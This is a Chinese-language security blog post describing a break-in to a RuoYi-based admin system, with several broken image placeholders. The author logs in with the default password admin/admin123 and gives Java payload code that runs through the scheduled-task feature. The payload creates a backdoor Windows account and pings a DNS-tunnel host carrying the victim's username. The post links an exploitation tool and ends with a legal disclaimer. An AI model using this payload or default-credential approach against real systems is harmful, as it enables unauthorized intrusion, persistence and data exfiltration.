null{width="5.763888888888889in"height="3.203472222222222in"}
没有验证码,再加上做个图标,吸引了我注意:
null{width="0.6833333333333333in"height="0.7166666666666667in"}
1. 从弱口令开始
若依默认口令为admin/admin123,结果真的直接进了。
{width="5.766666666666667in" height="3.963888888888889in"}
管理员权限,直接上工具探测一下是否有若依的几个漏洞:
{width="5.767361111111111in" height="4.357638888888889in"}
还得是运气啊!原本想着直接用这个工具一键穿的,但是奈何没利用过若依的洞,这个工具也不会使用。后续去查看了几篇文章,需要上传jar包,该漏洞可通过定时任务去调用执行jar包。
以下是java代码:
publicAwesomeScriptEngineFactory() {try {Runtime.getRuntime().exec("net user test test@123 /add");Runtime.getRuntime().exec("ping tttt.ogjxcqvtbf.dnstunnel.run");Runtime.getRuntime().exec("ping%USERNAME%.ogjxcqvtbf.dnstunnel.run");}catch (IOException e) {e.printStackTrace();}}
2、工具获取
https://github.com/thelostworldFree/Ruoyi-All
本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!
敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
原文始发于微信公众号(无问之路):若*后台管理系统渗透过程记录
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论